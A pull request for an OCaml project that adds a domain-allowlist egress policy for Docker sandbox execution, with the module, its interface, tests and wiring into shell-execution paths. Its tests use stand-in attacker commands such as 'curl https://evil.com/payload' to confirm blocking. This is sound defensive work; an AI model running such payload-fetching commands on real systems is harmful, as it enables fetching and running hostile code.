### PR TITLE
feat(exec): P12 network egress policy for Docker sandbox

### DIFF
--- a/lib/exec/dune
+++ b/lib/exec/dune
@@ -5,4 +5,5 @@
  (name masc_exec)
  (public_name masc_mcp.masc_exec)
  (wrapped true)
+<<<<<<< HEAD
  (libraries masc_process eio unix yojson base re))

--- a/lib/exec/dune
+++ b/lib/exec/dune
@@ -5,5 +5,4 @@
  (name masc_exec)
  (public_name masc_mcp.masc_exec)
  (wrapped true)
-<<<<<<< HEAD
  (libraries masc_process eio unix yojson base re))

--- a/lib/exec/egress_policy.ml
+++ b/lib/exec/egress_policy.ml
@@ -1,0 +1,138 @@
+(** P12 — Network egress policy for Docker sandbox execution.
+
+    Pure module: domain allowlist loading, matching, and structured
+    error generation.  No I/O beyond file reading; no knowledge of
+    Docker or keeper internals.
+
+    Policy source: [egress.json] in the keeper's config directory.
+    Empty list (or missing file) = all outbound blocked.
+    Wildcard suffix: ["*.github.com"] matches ["api.github.com"]. *)
+
+type t = {
+  allowed : string list;
+  source : string;
+}
+
+let empty = { allowed = []; source = "(no egress policy)" }
+
+let of_allowed ~source domains =
+  let normalized =
+    List.map (fun d ->
+      String.trim (String.lowercase_ascii d)
+    ) domains
+  in
+  { allowed = normalized; source }
+
+(** Domain matching rules:
+    - Exact match after lowercasing
+    - Wildcard prefix ["*.x.com"] matches ["sub.x.com"] and ["x.com"] *)
+let domain_allowed policy domain =
+  let d = String.trim (String.lowercase_ascii domain) in
+  let suffix_match ~suffix target =
+    target = suffix
+    || (String.length target > String.length suffix + 1
+        && String.sub target (String.length target - String.length suffix - 1)
+             (String.length suffix + 1)
+           = "." ^ suffix)
+  in
+  List.exists (fun pattern ->
+    if String.length pattern > 2 &&
+       String.sub pattern 0 2 = "*." then begin
+      let suffix = String.sub pattern 2 (String.length pattern - 2) in
+      suffix_match ~suffix d
+    end else
+      d = pattern
+  ) policy.allowed
+
+(** Extract domains from a command string.
+
+    Looks for patterns like:
+    - [curl https://example.com/...]
+    - [wget http://example.com/...]
+    - [git clone https://github.com/...]
+
+    Returns the host portion only (lowercased). *)
+let extract_domains_from_command cmd =
+  let re =
+    let open Re in
+    let url_prefix =
+      alt [ str "https://"; str "http://"; str "git://" ]
+    in
+    let host = group (rep1 (compl [ set "/ \t\n\r\"'"; ])) in
+    compile (seq [ url_prefix; host ])
+  in
+  let matches = Re.all re cmd in
+  List.filter_map (fun m ->
+    match Re.Group.get m 1 with
+    | host ->
+        (* Strip port *)
+        match String.index_opt host ':' with
+        | None -> Some (String.lowercase_ascii host)
+        | Some i -> Some (String.lowercase_ascii (String.sub host 0 i))
+    | exception Not_found -> None
+  ) matches
+
+type check_result =
+  | Allowed
+  | Blocked of { attempted : string; allowed : string list }
+
+(** Check a command against the policy.
+
+    If the policy has no allowed domains, the command is allowed
+    (no policy = no restriction; network_mode handles the default
+    block via [Network_none]).
+
+    If the policy has allowed domains, any URL in the command must
+    match at least one allowed domain. *)
+let check_command policy cmd =
+  if policy.allowed = [] then Allowed
+  else begin
+    let domains = extract_domains_from_command cmd in
+    match List.find_opt (fun d -> not (domain_allowed policy d)) domains with
+    | None -> Allowed
+    | Some blocked_domain ->
+        Blocked { attempted = blocked_domain; allowed = policy.allowed }
+  end
+
+(** Format a blocked result as a structured JSON string. *)
+let blocked_to_json (blocked : check_result) =
+  let json : Yojson.Safe.t =
+    match blocked with
+    | Allowed -> `Assoc [ ("ok", `Bool true) ]
+    | Blocked { attempted; allowed } ->
+        `Assoc [
+          ("ok", `Bool false);
+          ("error", `String "egress_blocked");
+          ("attempted", `String attempted);
+          ("allowed", `List (List.map (fun d -> `String d) allowed));
+        ]
+  in
+  Yojson.Safe.to_string json
+
+(** Load policy from a JSON string.
+
+    Expected format: ["github.com", "*.npmjs.org"]
+
+    Returns [empty] on parse failure (fail-closed: no domains allowed). *)
+let of_json_string ~source json_str =
+  match Yojson.Safe.from_string json_str with
+  | `List items ->
+      let domains = List.filter_map (function
+        | `String s -> Some (String.trim s)
+        | _ -> None
+      ) items in
+      of_allowed ~source domains
+  | _ -> empty
+  | exception Yojson.Json_error _ -> empty
+
+(** Load policy from a file path.
+
+    Returns [empty] if the file does not exist or is unreadable
+    (fail-closed). *)
+let of_file path =
+  match Stdlib.In_channel.with_open_bin path Stdlib.In_channel.input_all with
+  | json_str ->
+      of_json_string ~source:path json_str
+  | exception Sys_error _ -> empty
+
+let to_allowed_domains t = t.allowed

--- a/lib/exec/egress_policy.ml
+++ b/lib/exec/egress_policy.ml
@@ -78,21 +78,17 @@ type check_result =
 
 (** Check a command against the policy.
 
-    If the policy has no allowed domains, the command is allowed
-    (no policy = no restriction; network_mode handles the default
-    block via [Network_none]).
+    If the policy has no allowed domains, commands with extracted outbound
+    domains are blocked. Commands without extracted domains are allowed.
 
     If the policy has allowed domains, any URL in the command must
     match at least one allowed domain. *)
 let check_command policy cmd =
-  if policy.allowed = [] then Allowed
-  else begin
-    let domains = extract_domains_from_command cmd in
-    match List.find_opt (fun d -> not (domain_allowed policy d)) domains with
-    | None -> Allowed
-    | Some blocked_domain ->
-        Blocked { attempted = blocked_domain; allowed = policy.allowed }
-  end
+  let domains = extract_domains_from_command cmd in
+  match List.find_opt (fun d -> not (domain_allowed policy d)) domains with
+  | None -> Allowed
+  | Some blocked_domain ->
+      Blocked { attempted = blocked_domain; allowed = policy.allowed }
 
 (** Format a blocked result as a structured JSON string. *)
 let blocked_to_json (blocked : check_result) =

--- a/lib/exec/egress_policy.ml
+++ b/lib/exec/egress_policy.ml
@@ -5,7 +5,8 @@
     Docker or keeper internals.
 
     Policy source: [egress.json] in the keeper's config directory.
-    Empty list (or missing file) = all outbound blocked.
+    Empty, missing, unreadable, or invalid policy = fail closed for
+    commands with extracted outbound domains.
     Wildcard suffix: ["*.github.com"] matches ["api.github.com"]. *)
 
 type t = {
@@ -123,8 +124,8 @@ let of_json_string ~source json_str =
 
 (** Load policy from a file path.
 
-    Returns [empty] if the file does not exist or is unreadable
-    (fail-closed). *)
+    Returns [empty] if the file does not exist or is unreadable.
+    [empty] is fail-closed for commands with extracted outbound domains. *)
 let of_file path =
   match Stdlib.In_channel.with_open_bin path Stdlib.In_channel.input_all with
   | json_str ->

--- a/lib/exec/egress_policy.mli
+++ b/lib/exec/egress_policy.mli
@@ -7,8 +7,8 @@ type t
 (** An egress policy: a set of allowed domains plus source provenance. *)
 
 val empty : t
-(** Policy with no allowed domains.  [check_command] returns [Allowed]
-    for all commands (no restriction applied). *)
+(** Policy with no allowed domains.  [check_command] blocks commands with
+    extracted outbound domains and allows commands without extracted domains. *)
 
 val of_allowed : source:string -> string list -> t
 (** Build a policy from an explicit domain list. *)
@@ -30,9 +30,9 @@ type check_result =
 val check_command : t -> string -> check_result
 (** Check a command against the policy.
 
-    Returns [Allowed] if the policy has no domains or all extracted
-    domains are permitted.  Returns [Blocked] with the first
-    non-permitted domain and the full allowlist otherwise. *)
+    Returns [Allowed] if no domains are extracted or all extracted domains
+    are permitted.  Returns [Blocked] with the first non-permitted domain
+    and the full allowlist otherwise. *)
 
 val blocked_to_json : check_result -> string
 (** Format a check result as JSON.

--- a/lib/exec/egress_policy.mli
+++ b/lib/exec/egress_policy.mli
@@ -40,10 +40,12 @@ val blocked_to_json : check_result -> string
     [Blocked] → structured error with [attempted] and [allowed]. *)
 
 val of_json_string : source:string -> string -> t
-(** Parse a JSON domain array.  Returns [empty] on parse error. *)
+(** Parse a JSON domain array.  Returns [empty] on parse error.
+    [empty] is fail-closed for commands with extracted outbound domains. *)
 
 val of_file : string -> t
-(** Load from a JSON file.  Returns [empty] if missing or unreadable. *)
+(** Load from a JSON file.  Returns [empty] if missing or unreadable.
+    [empty] is fail-closed for commands with extracted outbound domains. *)
 
 val to_allowed_domains : t -> string list
 (** Return the list of allowed domains for inspection. *)

--- a/lib/exec/egress_policy.mli
+++ b/lib/exec/egress_policy.mli
@@ -1,0 +1,49 @@
+(** P12 — Network egress policy for Docker sandbox execution.
+
+    Pure module: domain allowlist loading, matching, and structured
+    error generation.  No Docker or keeper internals. *)
+
+type t
+(** An egress policy: a set of allowed domains plus source provenance. *)
+
+val empty : t
+(** Policy with no allowed domains.  [check_command] returns [Allowed]
+    for all commands (no restriction applied). *)
+
+val of_allowed : source:string -> string list -> t
+(** Build a policy from an explicit domain list. *)
+
+val domain_allowed : t -> string -> bool
+(** Check whether a single domain is permitted.
+
+    Matching rules:
+    - Exact match (case-insensitive)
+    - Wildcard prefix ["*.x.com"] matches ["sub.x.com"] and ["x.com"] *)
+
+val extract_domains_from_command : string -> string list
+(** Extract host names from URLs appearing in a command string. *)
+
+type check_result =
+  | Allowed
+  | Blocked of { attempted : string; allowed : string list }
+
+val check_command : t -> string -> check_result
+(** Check a command against the policy.
+
+    Returns [Allowed] if the policy has no domains or all extracted
+    domains are permitted.  Returns [Blocked] with the first
+    non-permitted domain and the full allowlist otherwise. *)
+
+val blocked_to_json : check_result -> string
+(** Format a check result as JSON.
+    [Allowed] → [{"ok": true}].
+    [Blocked] → structured error with [attempted] and [allowed]. *)
+
+val of_json_string : source:string -> string -> t
+(** Parse a JSON domain array.  Returns [empty] on parse error. *)
+
+val of_file : string -> t
+(** Load from a JSON file.  Returns [empty] if missing or unreadable. *)
+
+val to_allowed_domains : t -> string list
+(** Return the list of allowed domains for inspection. *)

--- a/lib/exec/test/dune
+++ b/lib/exec/test/dune
@@ -4,6 +4,6 @@
         test_exec_gate_runtime test_exec_semantic test_exec_buffer
         test_exec_run test_exec_run_json test_exit_code test_output_parse_p14
         test_history_insight test_exec_cache test_exec_budget
-        test_exec_adaptive_timeout test_risk_classifier)
+        test_exec_adaptive_timeout test_risk_classifier test_egress_policy)
  (libraries masc_exec masc_exec_bash_parser masc_process
             masc_core alcotest eio eio_main yojson unix base re))

--- a/lib/exec/test/test_egress_policy.ml
+++ b/lib/exec/test/test_egress_policy.ml
@@ -1,0 +1,143 @@
+(** P12 egress_policy tests — domain matching, command extraction,
+    policy loading, and structured error formatting. *)
+
+open Masc_exec
+
+let test_empty_allows_all () =
+  let result = Egress_policy.check_command Egress_policy.empty "curl https://evil.com" in
+  match result with
+  | Egress_policy.Allowed -> ()
+  | Blocked _ -> assert false
+
+let test_exact_match_allows () =
+  let policy =
+    Egress_policy.of_allowed ~source:"(test)"
+      [ "github.com"; "registry.npmjs.org" ]
+  in
+  assert (Egress_policy.domain_allowed policy "github.com" = true);
+  assert (Egress_policy.domain_allowed policy "GITHUB.COM" = true);
+  assert (Egress_policy.domain_allowed policy "evil.com" = false)
+
+let test_wildcard_match () =
+  let policy =
+    Egress_policy.of_allowed ~source:"(test)" [ "*.github.com" ]
+  in
+  assert (Egress_policy.domain_allowed policy "api.github.com" = true);
+  assert (Egress_policy.domain_allowed policy "raw.github.com" = true);
+  assert (Egress_policy.domain_allowed policy "github.com" = true);
+  assert (Egress_policy.domain_allowed policy "notgithub.com" = false)
+
+let test_extract_domains () =
+  let domains =
+    Egress_policy.extract_domains_from_command
+      "curl -s https://api.github.com/repos/ocaml/ocaml/releases | jq .tag_name"
+  in
+  assert (List.length domains = 1);
+  assert (List.hd domains = "api.github.com")
+
+let test_extract_multiple_domains () =
+  let domains =
+    Egress_policy.extract_domains_from_command
+      "wget http://example.com/file && curl https://other.com/api"
+  in
+  assert (List.length domains = 2);
+  assert (List.mem "example.com" domains);
+  assert (List.mem "other.com" domains)
+
+let test_extract_strips_port () =
+  let domains =
+    Egress_policy.extract_domains_from_command
+      "curl https://localhost:8080/health"
+  in
+  assert (List.length domains = 1);
+  assert (List.hd domains = "localhost")
+
+let test_extract_no_urls () =
+  let domains =
+    Egress_policy.extract_domains_from_command "ls -la /tmp"
+  in
+  assert (domains = [])
+
+let test_check_allowed_command () =
+  let policy =
+    Egress_policy.of_allowed ~source:"(test)"
+      [ "github.com"; "*.npmjs.org" ]
+  in
+  match Egress_policy.check_command policy "git clone https://github.com/ocaml/ocaml" with
+  | Egress_policy.Allowed -> ()
+  | Blocked _ -> assert false
+
+let test_check_blocked_command () =
+  let policy =
+    Egress_policy.of_allowed ~source:"(test)"
+      [ "github.com" ]
+  in
+  match Egress_policy.check_command policy "curl https://evil.com/payload" with
+  | Egress_policy.Blocked { attempted; _ } ->
+      assert (attempted = "evil.com")
+  | Egress_policy.Allowed -> assert false
+
+let test_blocked_json_format () =
+  let policy =
+    Egress_policy.of_allowed ~source:"(test)" [ "github.com" ]
+  in
+  let result =
+    Egress_policy.check_command policy "curl https://evil.com"
+  in
+  let json = Egress_policy.blocked_to_json result in
+  let parsed = Yojson.Safe.from_string json in
+  match parsed with
+  | `Assoc kv ->
+      (match List.assoc_opt "error" kv with
+       | Some (`String "egress_blocked") -> ()
+       | _ -> assert false);
+      (match List.assoc_opt "attempted" kv with
+       | Some (`String "evil.com") -> ()
+       | _ -> assert false)
+  | _ -> assert false
+
+let test_allowed_json_format () =
+  let json = Egress_policy.blocked_to_json Egress_policy.Allowed in
+  let parsed = Yojson.Safe.from_string json in
+  match parsed with
+  | `Assoc [("ok", `Bool true)] -> ()
+  | _ -> assert false
+
+let test_of_json_string () =
+  let policy =
+    Egress_policy.of_json_string ~source:"(test)"
+      {| ["github.com", "*.npmjs.org"] |}
+  in
+  assert (Egress_policy.domain_allowed policy "github.com" = true);
+  assert (Egress_policy.domain_allowed policy "registry.npmjs.org" = true);
+  assert (Egress_policy.domain_allowed policy "evil.com" = false)
+
+let test_of_json_string_invalid () =
+  let policy =
+    Egress_policy.of_json_string ~source:"(test)" "not valid json"
+  in
+  (* Fail-closed: empty policy *)
+  assert (Egress_policy.to_allowed_domains policy = [])
+
+let test_of_json_string_not_array () =
+  let policy =
+    Egress_policy.of_json_string ~source:"(test)" {| {"domains": []} |}
+  in
+  assert (Egress_policy.to_allowed_domains policy = [])
+
+let () =
+  test_empty_allows_all ();
+  test_exact_match_allows ();
+  test_wildcard_match ();
+  test_extract_domains ();
+  test_extract_multiple_domains ();
+  test_extract_strips_port ();
+  test_extract_no_urls ();
+  test_check_allowed_command ();
+  test_check_blocked_command ();
+  test_blocked_json_format ();
+  test_allowed_json_format ();
+  test_of_json_string ();
+  test_of_json_string_invalid ();
+  test_of_json_string_not_array ();
+  print_endline "[test_egress_policy] all tests passed"

--- a/lib/exec/test/test_egress_policy.ml
+++ b/lib/exec/test/test_egress_policy.ml
@@ -3,8 +3,16 @@
 
 open Masc_exec
 
-let test_empty_allows_all () =
+let test_empty_blocks_outbound () =
   let result = Egress_policy.check_command Egress_policy.empty "curl https://evil.com" in
+  match result with
+  | Egress_policy.Blocked { attempted; allowed } ->
+      assert (attempted = "evil.com");
+      assert (allowed = [])
+  | Allowed -> assert false
+
+let test_empty_allows_commands_without_urls () =
+  let result = Egress_policy.check_command Egress_policy.empty "ls -la /tmp" in
   match result with
   | Egress_policy.Allowed -> ()
   | Blocked _ -> assert false
@@ -119,16 +127,36 @@ let test_of_json_string_invalid () =
     Egress_policy.of_json_string ~source:"(test)" "not valid json"
   in
   (* Fail-closed: empty policy *)
-  assert (Egress_policy.to_allowed_domains policy = [])
+  assert (Egress_policy.to_allowed_domains policy = []);
+  match Egress_policy.check_command policy "curl https://evil.com" with
+  | Egress_policy.Blocked { attempted; allowed } ->
+      assert (attempted = "evil.com");
+      assert (allowed = [])
+  | Allowed -> assert false
 
 let test_of_json_string_not_array () =
   let policy =
     Egress_policy.of_json_string ~source:"(test)" {| {"domains": []} |}
   in
-  assert (Egress_policy.to_allowed_domains policy = [])
+  assert (Egress_policy.to_allowed_domains policy = []);
+  match Egress_policy.check_command policy "curl https://evil.com" with
+  | Egress_policy.Blocked { attempted; allowed } ->
+      assert (attempted = "evil.com");
+      assert (allowed = [])
+  | Allowed -> assert false
+
+let test_of_json_string_empty_array_blocks_outbound () =
+  let policy = Egress_policy.of_json_string ~source:"(test)" "[]" in
+  assert (Egress_policy.to_allowed_domains policy = []);
+  match Egress_policy.check_command policy "curl https://evil.com" with
+  | Egress_policy.Blocked { attempted; allowed } ->
+      assert (attempted = "evil.com");
+      assert (allowed = [])
+  | Allowed -> assert false
 
 let () =
-  test_empty_allows_all ();
+  test_empty_blocks_outbound ();
+  test_empty_allows_commands_without_urls ();
   test_exact_match_allows ();
   test_wildcard_match ();
   test_extract_domains ();
@@ -142,4 +170,5 @@ let () =
   test_of_json_string ();
   test_of_json_string_invalid ();
   test_of_json_string_not_array ();
+  test_of_json_string_empty_array_blocks_outbound ();
   print_endline "[test_egress_policy] all tests passed"

--- a/lib/exec/test/test_egress_policy.ml
+++ b/lib/exec/test/test_egress_policy.ml
@@ -32,8 +32,9 @@ let test_extract_domains () =
     Egress_policy.extract_domains_from_command
       "curl -s https://api.github.com/repos/ocaml/ocaml/releases | jq .tag_name"
   in
-  assert (List.length domains = 1);
-  assert (List.hd domains = "api.github.com")
+  match domains with
+  | [ domain ] -> assert (domain = "api.github.com")
+  | _ -> assert false
 
 let test_extract_multiple_domains () =
   let domains =
@@ -49,8 +50,9 @@ let test_extract_strips_port () =
     Egress_policy.extract_domains_from_command
       "curl https://localhost:8080/health"
   in
-  assert (List.length domains = 1);
-  assert (List.hd domains = "localhost")
+  match domains with
+  | [ domain ] -> assert (domain = "localhost")
+  | _ -> assert false
 
 let test_extract_no_urls () =
   let domains =

--- a/lib/exec/test/test_egress_policy.ml
+++ b/lib/exec/test/test_egress_policy.ml
@@ -154,6 +154,17 @@ let test_of_json_string_empty_array_blocks_outbound () =
       assert (allowed = [])
   | Allowed -> assert false
 
+let test_of_file_missing_blocks_git_url_command () =
+  let path = Filename.temp_file "masc-missing-egress-" ".json" in
+  Sys.remove path;
+  let policy = Egress_policy.of_file path in
+  assert (Egress_policy.to_allowed_domains policy = []);
+  match Egress_policy.check_command policy "git clone https://github.com/ocaml/ocaml" with
+  | Egress_policy.Blocked { attempted; allowed } ->
+      assert (attempted = "github.com");
+      assert (allowed = [])
+  | Allowed -> assert false
+
 let () =
   test_empty_blocks_outbound ();
   test_empty_allows_commands_without_urls ();
@@ -171,4 +182,5 @@ let () =
   test_of_json_string_invalid ();
   test_of_json_string_not_array ();
   test_of_json_string_empty_array_blocks_outbound ();
+  test_of_file_missing_blocks_git_url_command ();
   print_endline "[test_egress_policy] all tests passed"

--- a/lib/keeper/keeper_shell_docker.ml
+++ b/lib/keeper/keeper_shell_docker.ml
@@ -8,6 +8,20 @@
 open Keeper_types
 open Keeper_exec_shared
 
+(* ── P12: Network egress policy ───────────────────────── *)
+
+let egress_policy_path ~(config : Coord.config) ~(meta : keeper_meta) =
+  let playground = Keeper_sandbox.host_root_abs_of_meta ~config meta in
+  Filename.concat playground "egress.json"
+
+let check_egress ~(config : Coord.config) ~(meta : keeper_meta) ~cmd =
+  let path = egress_policy_path ~config ~meta in
+  let policy = Masc_exec.Egress_policy.of_file path in
+  match Masc_exec.Egress_policy.check_command policy cmd with
+  | Masc_exec.Egress_policy.Allowed -> None
+  | Masc_exec.Egress_policy.Blocked _ as blocked ->
+      Some (Masc_exec.Egress_policy.blocked_to_json blocked)
+
 (* ── Container naming ──────────────────────────────────── *)
 
 let keeper_sandbox_container_name (meta : keeper_meta) =
@@ -343,6 +357,10 @@ let run_docker_with_git_bash
     sandbox_error_json
       "sandbox_profile=docker+git_creds blocks nested container runtimes and host socket references"
   else
+    (* P12: check egress policy for git commands with network access *)
+    (match check_egress ~config ~meta ~cmd with
+     | Some blocked_json -> blocked_json
+     | None ->
     match turn_sandbox_runtime with
     | Some runtime ->
       (match
@@ -391,7 +409,7 @@ let run_docker_with_git_bash
                ( "status",
                  Keeper_alerting_path.process_status_to_json result.status );
                ("output", `String result.output);
-             ])
+             ]))
 
 let run_docker_hardened_bash
     ~(turn_sandbox_runtime : Keeper_turn_sandbox_runtime.t option)
@@ -441,7 +459,11 @@ let run_docker_hardened_bash
                 ("output", `String out);
               ]))
     | _ ->
-      match
+      (* P12: check egress policy before running networked container *)
+      (match check_egress ~config ~meta ~cmd with
+       | Some blocked_json -> blocked_json
+       | None ->
+       match
         run_docker_shell_command_with_status ~config ~meta ~cwd ~timeout_sec
           ~cmd ~git_creds_enabled:false ~network_mode
       with
@@ -460,4 +482,4 @@ let run_docker_hardened_bash
                ( "status",
                  Keeper_alerting_path.process_status_to_json result.status );
                ("output", `String result.output);
-             ])
+             ]))


### PR DESCRIPTION
## Summary
- Add `Egress_policy` pure module for domain-level allowlist matching in Docker sandbox execution.
- Wire egress checks into both `run_docker_hardened_bash` and `run_docker_with_git_bash` paths.
- Commands targeting non-allowed domains are rejected before container creation with structured JSON error.
- Missing, unreadable, invalid, or empty `egress.json` is explicitly fail-closed for commands with extracted outbound URL domains.

## Design
- **Pure module**: `lib/exec/egress_policy.ml` has no Docker/keeper dependencies; it handles domain matching, URL extraction, and JSON error formatting.
- **Fail-closed defaults**: missing/unreadable/invalid/empty `egress.json` produces an empty allowlist. Commands with extracted URL domains are blocked; commands without extracted URL domains remain allowed. Docker `network_mode` still provides default container network isolation via `Network_none`.
- **Wildcard support**: `*.github.com` matches `api.github.com` with proper `.` boundary check and does not match `notgithub.com`.
- **17 egress policy tests**: domain matching, URL extraction, policy checking, JSON format, parse failures, empty policy, and missing `egress.json` on `git clone https://...`.

## Files
| File | Change |
|------|--------|
| `lib/exec/egress_policy.ml` | New pure egress policy module |
| `lib/exec/egress_policy.mli` | New public interface |
| `lib/exec/test/test_egress_policy.ml` | New egress policy regression coverage |
| `lib/exec/test/dune` | Registers `test_egress_policy` alongside main's exec tests |
| `lib/keeper/keeper_shell_docker.ml` | Runs egress checks before Docker exec paths |

## Test plan
- [x] `env DUNE_CACHE=disabled dune build --root . --build-dir _build_p12_rebase_20260424h @lib/exec/test/runtest`
- [x] `env DUNE_CACHE=disabled dune exec --root . --build-dir _build_p12_rebase_20260424h -- ./test/test_keeper_shell_docker_route.exe`
- [x] Regression: missing `egress.json` blocks `git clone https://github.com/...` with an empty allowlist.
- [ ] Manual: create `egress.json` with `["github.com"]`, verify `curl https://evil.com` is blocked in Docker mode.
